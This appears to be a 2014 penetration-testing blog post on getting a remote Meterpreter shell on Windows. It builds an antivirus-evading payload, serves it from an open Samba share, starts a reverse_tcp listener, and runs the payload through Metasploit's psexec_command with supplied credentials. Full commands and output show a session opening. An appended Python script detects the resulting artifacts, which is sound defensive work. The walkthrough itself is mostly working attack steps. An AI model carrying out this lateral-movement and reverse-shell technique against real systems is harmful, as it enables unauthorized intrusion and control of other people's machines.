May 12, 2014

Moar Shellz!

Written by Larry Spohn
Any experienced pentester can name at least five or six different tools used to attain shell access on a remote system. I can think of eight off the top of my head:
  1. Metasploit psexec
  2. Metasploit psexec_psh
  3. Windows psexec executable
  4. Impacket psexec python script
  5. pth-winexe
  6. pth-wmis
  7. smbexec
  8. Veil-Catapult
All of these tools work and have their strengths and weaknesses. I'm going to share one more method that I recently discovered, using the Metasploit "psexec_command" module, created by Royce Davis (@r3dy__) of Accuvant LABS. First, we need to create an AV-safe executable to deploy to our target. If you haven't checked it out yet, Veil-Evasion is one of the easiest ways to create AV-safe executables. After we have an executable, we simply create an SMB share for our targets to access. Add this section to "/etc/samba/smb.conf":
[payloads$]
   comment = Payloads
   path = /root/veil-output/compiled
   browseable = yes
   read only = yes
   guest ok = yes
   public = yes
In Kali Linux, Samba is not running by default, so we need to start it:
root@kali:~# service samba start
[ ok ] Starting Samba daemons: nmbd smbd.
Next, we startup Metasploit and open a listener:
root@kali:~# msfconsole
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|`.""'.
  II     6.     .P  :  .' / |  `.  :
  II     'T;. .;P'  '.'  /  |    `.'
  II      'T; ;P'    `. /   |    .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


Large pentest? List, sort, group, tag and search your hosts and services
in Metasploit Pro -- type 'go_pro' to launch it now.

       =[ metasploit v4.9.2-2014043001 [core:4.9 api:1.0] ]
+ -- --=[ 1355 exploits - 830 auxiliary - 237 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops      ]

msf> use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 0.0.0.0:443 
msf exploit(handler) > [*] Starting the payload handler...
Now, we set up "psexec_command" and configure the module to run the executable payload directly from our SMB share:
msf exploit(handler) > use auxiliary/admin/smb/psexec_command
msf auxiliary(psexec_command) > set COMMAND start \\192.168.81.196\payloads$\TrustedSec39.exe
COMMAND => start \\192.168.81.196\payloads$\TrustedSec39.exe
msf auxiliary(psexec_command) > set RHOSTS 192.168.81.202
RHOSTS => 192.168.81.202
msf auxiliary(psexec_command) > set SMBPass OMGDontPwnMe!
SMBPass => OMGDontPwnMe!
msf auxiliary(psexec_command) > set SMBUser TrustedSec
SMBUser => TrustedSec
Pull the trigger and cross your fingers:
msf auxiliary(psexec_command) > exploit

[*] 192.168.81.202:445 - Executing the command...
[*] Sending stage (769536 bytes) to 192.168.81.202
[*] 192.168.81.202:445 - Getting the command output...
[*] 192.168.81.202:445 - Command finished with no output
[*] 192.168.81.202:445 - Executing cleanup...
[-] 192.168.81.202:445 - Unable to cleanup \WINDOWS\Temp\FtHThcznCVkttXJy.txt. Error: The server responded with error: STATUS_SHARING_VIOLATION (Command=6 WordCount=0)
[-] 192.168.81.202:445 - Unable to cleanup. Maybe you'll need to manually remove true, false from the target.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(psexec_command) > [*] Meterpreter session 1 opened (192.168.81.196:443 -> 192.168.81.202:14336) at 2014-05-06 09:33:39 -0400
It does leave a randomly named .txt file in the "Windows\Temp" directory that you need to clean up manually, but that's it! You can also point RHOSTS to a text file of multiple remote hosts to target. MOAR SHELLZ!

This article was written by Larry Spohn | Senior Security Consultant @Spoonman1091.
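From the other side of the wire, the run above leaves two things in host telemetry: a process launched straight from a UNC share (the "start \\host\share\file.exe" command) and the random-named .txt that psexec_command drops in Windows\Temp. The following Python check is an added example, not code from the original post; the "kind|path|detail" record shape and the 12-letter filename threshold are assumptions, and the sample records are constructed.

```python
import re
from typing import List, Tuple

# Constructed sample telemetry (not from the original post). The record shape
# "kind|path|detail" is an assumption about what your log pipeline emits:
#   process|<image path>|<command line>
#   file|<created file path>|<creating process>
SAMPLE_EVENTS = [
    r"process|C:\Windows\System32\cmd.exe|cmd.exe /c start \\192.168.81.196\payloads$\TrustedSec39.exe",
    r"process|C:\Program Files\App\app.exe|app.exe --update",
    r"process|\\fileserver\tools\helper.exe|helper.exe",
    r"process|C:\Windows\System32\cmd.exe|cmd.exe /c dir \\fileserver\share",
    r"file|C:\WINDOWS\Temp\FtHThcznCVkttXJy.txt|C:\Windows\System32\cmd.exe",
    r"file|C:\WINDOWS\Temp\setup.log|C:\Windows\System32\msiexec.exe",
]

# An executable reached through a UNC path: \\host\share\...\name.exe
UNC_EXE = re.compile(r"\\\\[^\\\s]+\\\S*?\.exe\b", re.IGNORECASE)
# psexec_command's output file: purely alphabetic random basename under
# Windows\Temp (the post's example is 16 letters; 12+ is an assumed cutoff)
TEMP_TXT = re.compile(r"\\windows\\temp\\[a-z]{12,}\.txt$", re.IGNORECASE)


def flag_events(events: List[str]) -> List[Tuple[str, str]]:
    """Return (path, reason) for every record that looks like a psexec_command artifact."""
    hits = []
    for rec in events:
        kind, path, detail = rec.split("|", 2)
        if kind == "process":
            if path.startswith("\\\\"):
                hits.append((path, "process image lives on a remote share"))
            else:
                m = UNC_EXE.search(detail)
                if m:
                    hits.append((path, "command line launches " + m.group(0)))
        elif kind == "file" and TEMP_TXT.search(path):
            hits.append((path, "random-named .txt dropped in Windows\\Temp"))
    return hits


if __name__ == "__main__":
    for path, reason in flag_events(SAMPLE_EVENTS):
        print(f"{reason}: {path}")
```

The UNC check will also fire on legitimate admin scripts run from file servers, so tune it with an allow-list of known share hosts rather than turning it off.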